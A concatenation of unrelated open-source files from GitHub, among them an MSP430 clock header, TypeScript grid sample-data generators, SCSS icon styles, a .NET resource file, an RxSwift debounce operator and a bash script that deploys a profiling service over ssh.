* \param xtdrive Bits defining the XT drive mode
******************************************************************************/
extern void XT1_Start(unsigned int xtdrive);
/*******************************************************************************
* \brief Startup routine for XT1 with timeout counter
*
* \param xtdrive Bits defining the XT drive mode
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int XT1_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
/*******************************************************************************
* \brief Use XT1 in Bypasss mode
******************************************************************************/
extern void XT1_Bypass(void);
#endif
/*******************************************************************************
* \brief Stop XT1 oscillator
******************************************************************************/
extern void XT1_Stop(void);
#if 0
/*******************************************************************************
* \brief Startup routine for XT2
*
* \param xtdrive Bits defining the XT drive mode
******************************************************************************/
extern void XT2_Start(unsigned int xtdrive);
/*******************************************************************************
* \brief Startup routine for XT2 with timeout counter
*
* \param xtdrive Bits defining the XT drive mode
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int XT2_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
/*******************************************************************************
* \brief Use XT2 in Bypasss mode for MCLK
******************************************************************************/
extern void XT2_Bypass(void);
/*******************************************************************************
* \brief Stop XT2 oscillator
******************************************************************************/
extern void XT2_Stop(void);
#endif
/*******************************************************************************
* \brief Initializes FLL of the UCS and wait till settled before allowing
* code execution to resume. The use of this function is preferred
* over the use of Init_FLL().
*
* \param fsystem Required system frequency (MCLK) in kHz
* \param ratio Ratio between fsystem and FLLREFCLK
******************************************************************************/
extern void Init_FLL_Settle(unsigned int fsystem, unsigned int ratio);
#endif /* HAL_UCS_H */
| {
"pile_set_name": "Github"
} |
interface IRowGenerateData {
id: number;
reportsto: number | null;
available: boolean | null;
firstname: string;
lastname: string;
name: string;
productname: string;
quantity: string | number;
total: string | number;
price: string | number;
date: Date;
}
interface IRowGenerateOrdersData {
id: number | string;
parentid: number | null;
customer: string;
firstname: string;
lastname: string;
name: string;
price: string | number;
quantity: string | number;
total: string | number;
date: Date;
}
export function generateData(rowscount?: number): IRowGenerateData[] {
return generatedata(rowscount);
}
export function generatedata(rowscount?: number, hasNullValues?: boolean): IRowGenerateData[] {
const data: IRowGenerateData[] = new Array();
if (rowscount === undefined) {
rowscount = 100;
}
const firstNames =
[
'Andrew', 'Nancy', 'Shelley', 'Regina', 'Yoshi', 'Antoni', 'Mayumi', 'Ian', 'Peter', 'Lars', 'Petra', 'Martin', 'Sven', 'Elio', 'Beate', 'Cheryl', 'Michael', 'Guylene'
];
const lastNames =
[
'Fuller', 'Davolio', 'Burke', 'Murphy', 'Nagase', 'Saavedra', 'Ohno', 'Devling', 'Wilson', 'Peterson', 'Winkler', 'Bein', 'Petersen', 'Rossi', 'Vileid', 'Saylor', 'Bjorn', 'Nodier'
];
const productNames =
[
'Black Tea', 'Green Tea', 'Caffe Espresso', 'Doubleshot Espresso', 'Caffe Latte', 'White Chocolate Mocha', 'Caramel Latte', 'Caffe Americano', 'Cappuccino', 'Espresso Truffle', 'Espresso con Panna', 'Peppermint Mocha Twist'
];
const priceValues =
[
'2.25', '1.5', '3.0', '3.3', '4.5', '3.6', '3.8', '2.5', '5.0', '1.75', '3.25', '4.0'
];
for (let i = 0; i < rowscount; i++) {
const row = {} as IRowGenerateData;
const productindex = Math.floor(Math.random() * productNames.length);
const price = parseFloat(priceValues[productindex]);
const quantity = 1 + Math.round(Math.random() * 10);
row.id = i;
row.reportsto = Math.floor(Math.random() * firstNames.length);
if (i % Math.floor(Math.random() * firstNames.length) === 0) {
row.reportsto = null;
}
row.available = productindex % 2 === 0;
if (hasNullValues === true) {
if (productindex % 2 !== 0) {
const random = Math.floor(Math.random() * rowscount);
row.available = i % random === 0 ? null : false;
}
}
row.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
row.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
row.name = row.firstname + ' ' + row.lastname;
row.productname = productNames[productindex];
row.price = price;
row.quantity = quantity;
row.total = price * quantity;
const date = new Date();
date.setFullYear(2016, Math.floor(Math.random() * 11), Math.floor(Math.random() * 27));
date.setHours(0, 0, 0, 0);
row.date = date;
data[i] = row;
}
return data;
}
export function generateordersdata(rowscount?: number): IRowGenerateOrdersData[] {
// prepare the data
const data: IRowGenerateOrdersData[] = new Array();
if (rowscount === undefined) {
rowscount = 10;
}
const firstNames =
[
'Andrew', 'Nancy', 'Shelley', 'Regina', 'Yoshi', 'Antoni', 'Mayumi', 'Ian', 'Peter', 'Lars', 'Petra', 'Martin', 'Sven', 'Elio', 'Beate', 'Cheryl', 'Michael', 'Guylene'
];
const lastNames =
[
'Fuller', 'Davolio', 'Burke', 'Murphy', 'Nagase', 'Saavedra', 'Ohno', 'Devling', 'Wilson', 'Peterson', 'Winkler', 'Bein', 'Petersen', 'Rossi', 'Vileid', 'Saylor', 'Bjorn', 'Nodier'
];
const productNames =
[
'Black Tea', 'Green Tea', 'Caffe Espresso', 'Doubleshot Espresso', 'Caffe Latte', 'White Chocolate Mocha', 'Caramel Latte', 'Caffe Americano', 'Cappuccino', 'Espresso Truffle', 'Espresso con Panna', 'Peppermint Mocha Twist'
];
const priceValues =
[
'2.25', '1.5', '3.0', '3.3', '4.5', '3.6', '3.8', '2.5', '5.0', '1.75', '3.25', '4.0'
];
const companyNames = ['Dolor Foundation', 'Vivamus Non Lorem LLP', 'Vel Ltd', 'Turpis Incorporated', 'Egestas Nunc PC', 'At Pretium Aliquet Associates', 'Feugiat Inc.', 'Lacus Industries', 'Senectus Et Foundation', 'Sed LLC', 'Maecenas Mi Felis LLC', 'Pede Blandit Ltd', 'Pellentesque Habitant Morbi Institute'
, 'Mollis Vitae Industries', 'Malesuada Vel Convallis LLP', 'Risus Duis Corp.', 'Convallis LLP', 'Lobortis Augue LLC', 'Auctor LLP', 'Neque Inc.', 'Lorem Eu Corporation'];
for (let i = 0; i < rowscount; i++) {
const row = {} as IRowGenerateOrdersData;
row.id = i;
row.parentid = null;
row.name = 'Order ' + i;
row.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
row.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
row.customer = companyNames[Math.floor(Math.random() * companyNames.length)];
const date = new Date();
const month = Math.floor(Math.random() * 11);
const day = Math.floor(Math.random() * 27);
date.setFullYear(2016, month, day);
date.setHours(0, 0, 0, 0);
row.date = date;
row.price = '';
row.quantity = '';
data.push(row);
const subRowsCount = 1+Math.round(Math.random() * 8);
let t = 0;
for (let j = 0; j < subRowsCount; j++) {
const subRow = {} as IRowGenerateOrdersData;
const productindex = Math.floor(Math.random() * productNames.length);
const price = parseFloat(priceValues[productindex]);
const quantity = 1;
subRow.name = productNames[productindex];
subRow.id = '' + i + '.' + (1 + j);
subRow.parentid = i;
subRow.price = price;
subRow.quantity = 1;
const subDate = new Date();
subDate.setFullYear(2016, month, day);
subDate.setHours(Math.floor(Math.random() * 23), Math.floor(Math.random() * 59), 0, 0);
subRow.date = subDate;
row.firstname = firstNames[Math.floor(Math.random() * firstNames.length)];
row.lastname = lastNames[Math.floor(Math.random() * lastNames.length)];
subRow.customer = row.firstname + ' ' + row.lastname;
t += quantity * price;
data.push(subRow);
}
row.price = t;
row.quantity = 1;
}
return data;
} | {
"pile_set_name": "Github"
} |
a = 10; b = 1; c = [3, 4]
using Complementarity, JuMP
m = MCPModel()
@variable(m, q[1:2] >= 0)
@mapping(m, F[i in 1:2], - (a - c[i] - 2b*q[i] - b*q[i%2+1]) )
@complementarity(m, F, q)
solveMCP(m)
@show result_value.(q)
status = solveMCP(m, solver=:NLsolve)
@show result_value.(q)
| {
"pile_set_name": "Github"
} |
// Copyright Contributors to the Amundsen project.
// SPDX-License-Identifier: Apache-2.0
@import 'variables';
$icon-size: 24px;
$icon-small-size: 16px;
// Icons
// Lookout! When you update one of these, please update the enums on
// ../js/interfaces/Enums.ts
// Map of Database names and icon paths
$data-stores: (
database: '../images/icons/Database.svg',
hive: '../images/icons/logo-hive.svg',
bigquery: '../images/icons/logo-bigquery.svg',
druid: '../images/icons/logo-druid.svg',
presto: '../images/icons/logo-presto.svg',
postgres: '../images/icons/logo-postgres.svg',
redshift: '../images/icons/logo-redshift.svg',
snowflake: '../images/icons/logo-snowflake.svg',
);
// Map of Dashboard names and icon paths
$dashboards: (
dashboard: '../images/icons/dashboard.svg',
mode: '../images/icons/logo-mode.svg',
redash: '../images/icons/logo-redash.svg',
tableau: '../images/icons/logo-tableau.svg',
);
// Map of User names and icon paths
$users: (
users: '../images/icons/users.svg',
);
$check: (
check: '../images/icons/check.svg',
);
// Given a Map of key/value pairs, generates a new class
@mixin iconBackgrounds($map) {
@each $name, $url in $map {
&.icon-#{$name} {
background: transparent url($url) center center / contain no-repeat;
}
}
}
span.icon {
// Generate Icons
@include iconBackgrounds($data-stores);
@include iconBackgrounds($dashboards);
@include iconBackgrounds($users);
@include iconBackgrounds($check);
background-color: $icon-bg;
border: none;
display: inline-block;
height: $icon-size;
margin: auto 16px auto 0;
min-width: $icon-size;
vertical-align: middle;
width: $icon-size;
}
img.icon {
/* DEPRECATED: follow behavior above to generate
icons */
background-color: $icon-bg;
border: none;
height: $icon-size;
margin: -3px 4px -3px 0;
-webkit-mask-repeat: no-repeat;
mask-repeat: no-repeat;
-webkit-mask-size: contain;
mask-size: contain;
min-width: $icon-size;
width: $icon-size;
&.icon-small {
height: $icon-small-size;
-webkit-mask-size: $icon-small-size $icon-small-size;
mask-size: $icon-small-size $icon-small-size;
min-width: $icon-small-size;
width: $icon-small-size;
}
&.icon-color {
background-color: $icon-bg-brand;
}
&.icon-dark {
background-color: $icon-bg-dark;
}
&.icon-alert {
-webkit-mask-image: url('../images/icons/Alert-Triangle.svg');
mask-image: url('../images/icons/Alert-Triangle.svg');
}
&.icon-bookmark {
-webkit-mask-image: url('../images/icons/Favorite.svg');
mask-image: url('../images/icons/Favorite.svg');
}
&.icon-bookmark-filled {
-webkit-mask-image: url('../images/icons/Favorite-Filled.svg');
mask-image: url('../images/icons/Favorite-Filled.svg');
}
&.icon-delete {
-webkit-mask-image: url('../images/icons/Trash.svg');
mask-image: url('../images/icons/Trash.svg');
}
&.icon-red-triangle-warning {
-webkit-mask-image: url('../images/icons/DataQualityWarning.svg');
mask-image: url('../images/icons/DataQualityWarning.svg');
}
&.icon-down {
-webkit-mask-image: url('../images/icons/Down.svg');
mask-image: url('../images/icons/Down.svg');
}
&.icon-edit {
-webkit-mask-image: url('../images/icons/Edit.svg');
mask-image: url('../images/icons/Edit.svg');
}
&.icon-help {
-webkit-mask-image: url('../images/icons/Help-Circle.svg');
mask-image: url('../images/icons/Help-Circle.svg');
}
&.icon-github {
-webkit-mask-image: url('../images/icons/github.svg');
mask-image: url('../images/icons/github.svg');
}
&.icon-left {
-webkit-mask-image: url('../images/icons/Left.svg');
mask-image: url('../images/icons/Left.svg');
}
&.icon-loading {
-webkit-mask-image: url('../images/icons/Loader.svg');
mask-image: url('../images/icons/Loader.svg');
}
&.icon-mail {
-webkit-mask-image: url('../images/icons/mail.svg');
mask-image: url('../images/icons/mail.svg');
}
&.icon-plus {
-webkit-mask-image: url('../images/icons/plus.svg');
mask-image: url('../images/icons/plus.svg');
}
&.icon-plus-circle {
-webkit-mask-image: url('../images/icons/Plus-Circle.svg');
mask-image: url('../images/icons/Plus-Circle.svg');
}
&.icon-preview {
-webkit-mask-image: url('../images/icons/Preview.svg');
mask-image: url('../images/icons/Preview.svg');
}
&.icon-refresh {
-webkit-mask-image: url('../images/icons/Refresh-cw.svg');
mask-image: url('../images/icons/Refresh-cw.svg');
}
&.icon-right {
-webkit-mask-image: url('../images/icons/Right.svg');
mask-image: url('../images/icons/Right.svg');
}
&.icon-search {
-webkit-mask-image: url('../images/icons/Search.svg');
mask-image: url('../images/icons/Search.svg');
}
&.icon-send {
-webkit-mask-image: url('../images/icons/Send.svg');
mask-image: url('../images/icons/Send.svg');
}
&.icon-slack {
-webkit-mask-image: url('../images/icons/slack.svg');
mask-image: url('../images/icons/slack.svg');
}
&.icon-up {
-webkit-mask-image: url('../images/icons/Up.svg');
mask-image: url('../images/icons/Up.svg');
}
&.icon-user {
-webkit-mask-image: url('../images/icons/users.svg');
mask-image: url('../images/icons/users.svg');
}
&.icon-more {
-webkit-mask-image: url('../images/icons/More.svg');
mask-image: url('../images/icons/More.svg');
}
}
.disabled,
:disabled {
> img.icon,
> img.icon.icon-color {
background-color: $icon-bg-disabled;
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="abp_js" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\abp.js.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="mgwz_dll" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\mgwz.dll.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="minimize" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\minimize.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="option" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\option.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="pac_txt" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\pac.txt.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="privoxy_conf" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\privoxy_conf.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;gb2312</value>
</data>
<data name="privoxy_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\privoxy.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="restart" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\restart.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="server" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\server.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="sysproxy64_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\sysproxy64.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="sysproxy_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\sysproxy.exe.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
</root> | {
"pile_set_name": "Github"
} |
// Copyright 2017 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
function Module(stdlib, foreign, heap) {
"use asm";
var MEM64 = new stdlib.Float64Array(heap);
function foo(i) {
i = i | 0;
MEM64[032 ] = +(i >>> 7 ) / 2.;
return +MEM64[0];
}
return { foo: foo };
}
var foo = Module(this, {}, new ArrayBuffer( "" ? this : this)).foo;
assertEquals(NaN, foo(1));
| {
"pile_set_name": "Github"
} |
train:
npm install
npm start
clean_build:
rm -f *ubyte
rm -rf node_modules
rm -f package-lock.json
clean:
rm -f *ubyte
rm -rf node_modules
rm -f package-lock.json
rm -f model.json
rm -f weights.bin
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Aurora.Profiles.LeagueOfLegends.GSI.Nodes
{
public class AbilitiesNode : Node
{
public AbilityNode Q = new AbilityNode();
public AbilityNode W = new AbilityNode();
public AbilityNode E = new AbilityNode();
public AbilityNode R = new AbilityNode();
//TODO: if there is anything useful for the passive later, add it here
}
}
| {
"pile_set_name": "Github"
} |
@inherits Nancy.ViewEngines.Razor.NancyRazorViewBase<dynamic>
Hello @ViewBag.Name
@Html.Partial("_PartialTest.cshtml") | {
"pile_set_name": "Github"
} |
---
title: object.ts
nav_order: 4
parent: Modules
---
---
<h2 class="text-delta">Table of contents</h2>
- [ModelAlgebraObject (interface)](#modelalgebraobject-interface)
- [ModelAlgebraObject1 (interface)](#modelalgebraobject1-interface)
- [ModelAlgebraObject2 (interface)](#modelalgebraobject2-interface)
- [ObjectURI (type alias)](#objecturi-type-alias)
- [PropsKind1 (type alias)](#propskind1-type-alias)
- [PropsKind2 (type alias)](#propskind2-type-alias)
- [ObjectURI (constant)](#objecturi-constant)
---
# ModelAlgebraObject (interface)
**Signature**
```ts
export interface ModelAlgebraObject<F, Env> {
_F: F
interface: {
<Props extends AnyMProps<F>>(
props: Props,
name: string,
config?: ConfigsForType<Env, { [k in keyof Props]: Props[k]['_E'] }, { [k in keyof Props]: Props[k]['_A'] }>
): HKT2<F, Env, { [k in keyof Props]: Props[k]['_E'] }, { [k in keyof Props]: Props[k]['_A'] }>
}
partial: {
<Props extends AnyMProps<F>>(
props: Props,
name: string,
config?: ConfigsForType<
Env,
Partial<{ [k in keyof Props]: Props[k]['_E'] }>,
Partial<{ [k in keyof Props]: Props[k]['_A'] }>
>
): HKT2<F, Env, Partial<{ [k in keyof Props]: Props[k]['_E'] }>, Partial<{ [k in keyof Props]: Props[k]['_A'] }>>
}
both: {
<Props extends AnyMProps<F>, PProps extends AnyMProps<F>>(
props: Props,
partial: PProps,
name: string,
config?: ConfigsForType<
Env,
{ [k in keyof Props]: Props[k]['_E'] } & Partial<{ [k in keyof PProps]: PProps[k]['_E'] }>,
{ [k in keyof Props]: Props[k]['_A'] } & Partial<{ [k in keyof PProps]: PProps[k]['_A'] }>
>
): HKT2<
F,
Env,
{ [k in keyof Props]: Props[k]['_E'] } & Partial<{ [k in keyof PProps]: PProps[k]['_E'] }>,
{ [k in keyof Props]: Props[k]['_A'] } & Partial<{ [k in keyof PProps]: PProps[k]['_A'] }>
>
}
}
```
Added in v0.0.1
# ModelAlgebraObject1 (interface)
**Signature**
```ts
export interface ModelAlgebraObject1<F extends URIS, Env extends AnyEnv> {
_F: F
interface: <Props>(
props: PropsKind1<F, Props, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Props>
) => Kind<F, Env, Props>
partial: <Props>(
props: PropsKind1<F, Props, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Partial<Props>>
) => Kind<F, Env, Partial<Props>>
both: <Props, PProps>(
props: PropsKind1<F, Props, Env>,
partial: PropsKind1<F, PProps, Env>,
name: string,
config?: ConfigsForType<Env, unknown, Props & Partial<PProps>>
) => Kind<F, Env, Props & Partial<PProps>>
}
```
Added in v0.0.1
# ModelAlgebraObject2 (interface)
**Signature**
```ts
export interface ModelAlgebraObject2<F extends URIS2, Env extends AnyEnv> {
_F: F
interface: <PropsE, PropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
name: string,
config?: ConfigsForType<Env, PropsE, PropsA>
) => Kind2<F, Env, PropsE, PropsA>
partial: <PropsE, PropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
name: string,
config?: ConfigsForType<Env, Partial<PropsE>, Partial<PropsA>>
) => Kind2<F, Env, Partial<PropsE>, Partial<PropsA>>
both: <PropsE, PPropsE, PropsA, PPropsA>(
props: PropsKind2<F, PropsE, PropsA, Env>,
partial: PropsKind2<F, PPropsE, PPropsA, Env>,
name: string,
config?: ConfigsForType<Env, PropsE & Partial<PPropsE>, PropsA & Partial<PPropsA>>
) => Kind2<F, Env, PropsE & Partial<PPropsE>, PropsA & Partial<PPropsA>>
}
```
Added in v0.0.1
# ObjectURI (type alias)
**Signature**
```ts
export type ObjectURI = typeof ObjectURI
```
Added in v0.0.1
# PropsKind1 (type alias)
**Signature**
```ts
export type PropsKind1<F extends URIS, PropsA, R> = { [k in keyof PropsA]: Kind<F, R, PropsA[k]> }
```
Added in v0.0.1
# PropsKind2 (type alias)
**Signature**
```ts
export type PropsKind2<F extends URIS2, PropsA, PropsE, R> = {
[k in keyof PropsA & keyof PropsE]: Kind2<F, R, PropsA[k], PropsE[k]>
}
```
Added in v0.0.1
# ObjectURI (constant)
**Signature**
```ts
export const ObjectURI: "ObjectURI" = ...
```
Added in v0.0.1
| {
"pile_set_name": "Github"
} |
//
// Debounce.swift
// RxSwift
//
// Created by Krunoslav Zaher on 9/11/16.
// Copyright © 2016 Krunoslav Zaher. All rights reserved.
//
extension ObservableType {
/**
Ignores elements from an observable sequence which are followed by another element within a specified relative time duration, using the specified scheduler to run throttling timers.
- seealso: [debounce operator on reactivex.io](http://reactivex.io/documentation/operators/debounce.html)
- parameter dueTime: Throttling duration for each element.
- parameter scheduler: Scheduler to run the throttle timers on.
- returns: The throttled sequence.
*/
public func debounce(_ dueTime: RxTimeInterval, scheduler: SchedulerType)
-> Observable<E> {
return Debounce(source: self.asObservable(), dueTime: dueTime, scheduler: scheduler)
}
}
final fileprivate class DebounceSink<O: ObserverType>
: Sink<O>
, ObserverType
, LockOwnerType
, SynchronizedOnType {
typealias Element = O.E
typealias ParentType = Debounce<Element>
private let _parent: ParentType
let _lock = RecursiveLock()
// state
private var _id = 0 as UInt64
private var _value: Element? = nil
let cancellable = SerialDisposable()
init(parent: ParentType, observer: O, cancel: Cancelable) {
_parent = parent
super.init(observer: observer, cancel: cancel)
}
func run() -> Disposable {
let subscription = _parent._source.subscribe(self)
return Disposables.create(subscription, cancellable)
}
func on(_ event: Event<Element>) {
synchronizedOn(event)
}
func _synchronized_on(_ event: Event<Element>) {
switch event {
case .next(let element):
_id = _id &+ 1
let currentId = _id
_value = element
let scheduler = _parent._scheduler
let dueTime = _parent._dueTime
let d = SingleAssignmentDisposable()
self.cancellable.disposable = d
d.setDisposable(scheduler.scheduleRelative(currentId, dueTime: dueTime, action: self.propagate))
case .error:
_value = nil
forwardOn(event)
dispose()
case .completed:
if let value = _value {
_value = nil
forwardOn(.next(value))
}
forwardOn(.completed)
dispose()
}
}
func propagate(_ currentId: UInt64) -> Disposable {
_lock.lock(); defer { _lock.unlock() } // {
let originalValue = _value
if let value = originalValue, _id == currentId {
_value = nil
forwardOn(.next(value))
}
// }
return Disposables.create()
}
}
final fileprivate class Debounce<Element> : Producer<Element> {
fileprivate let _source: Observable<Element>
fileprivate let _dueTime: RxTimeInterval
fileprivate let _scheduler: SchedulerType
init(source: Observable<Element>, dueTime: RxTimeInterval, scheduler: SchedulerType) {
_source = source
_dueTime = dueTime
_scheduler = scheduler
}
override func run<O: ObserverType>(_ observer: O, cancel: Cancelable) -> (sink: Disposable, subscription: Disposable) where O.E == Element {
let sink = DebounceSink(parent: self, observer: observer, cancel: cancel)
let subscription = sink.run()
return (sink: sink, subscription: subscription)
}
}
| {
"pile_set_name": "Github"
} |
<component name="libraryTable">
<library name="Maven: org.antlr:stringtemplate:3.2.1">
<CLASSES>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1.jar!/" />
</CLASSES>
<JAVADOC>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1-javadoc.jar!/" />
</JAVADOC>
<SOURCES>
<root url="jar://$MAVEN_REPOSITORY$/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1-sources.jar!/" />
</SOURCES>
</library>
</component> | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="body">#ffffeb</color>
<color name="sky">#e2f6ff</color>
<color name="blue">#1997d4</color>
<color name="white">#f9f9f9</color>
<color name="black">#000000</color>
</resources> | {
"pile_set_name": "Github"
} |
#!/bin/bash
# Copyright (c) 2020 The Orbit Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script first runs the ggp ssh init command to get the needed
# credentials to connect via ssh. Then it connects to the instance
# with portforwarding and starts OrbitService. To also deploy OrbitService,
# invoke with a the argument --deploy and a path to the OrbitService executable
# e.g. run_service_ssh.sh --deploy build/bin/OrbitService
# All other arguments will be passed to OrbitService.
if [ -z "$GGP_SDK_PATH" ]; then
echo "Ggp sdk not found"
exit 1
fi
GGP_EXEC="$GGP_SDK_PATH/dev/bin/ggp"
OTHER_ARGS="$@"
if [ ! -z "$1" ] && [ "$1" == "--deploy" -o "$1" == "-deploy" ]; then
$GGP_EXEC ssh put "$2"
$GGP_EXEC ssh shell -- chmod u+x /mnt/developer/OrbitService
OTHER_ARGS="${@:3}"
fi
OUTPUT=$(eval $GGP_EXEC ssh init | tee /dev/tty)
while IFS= read -r line; do
if [[ $line == *"User:"* ]]; then
GGP_USER=$(echo ${line/User:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Host:"* ]]; then
GGP_HOST=$(echo ${line/Host:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Port:"* ]]; then
GGP_PORT=$(echo ${line/Port:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Key Path:"* ]]; then
GGP_KEY_PATH=$(echo ${line/Key Path:/} | sed -e 's/^[[:space:]]*//')
fi
if [[ $line == *"Known Hosts Path:"* ]]; then
GGP_KNOWN_HOSTS_PATH=$(echo ${line/Known Hosts Path:/} | sed -e 's/^[[:space:]]*//')
fi
done <<< "$OUTPUT"
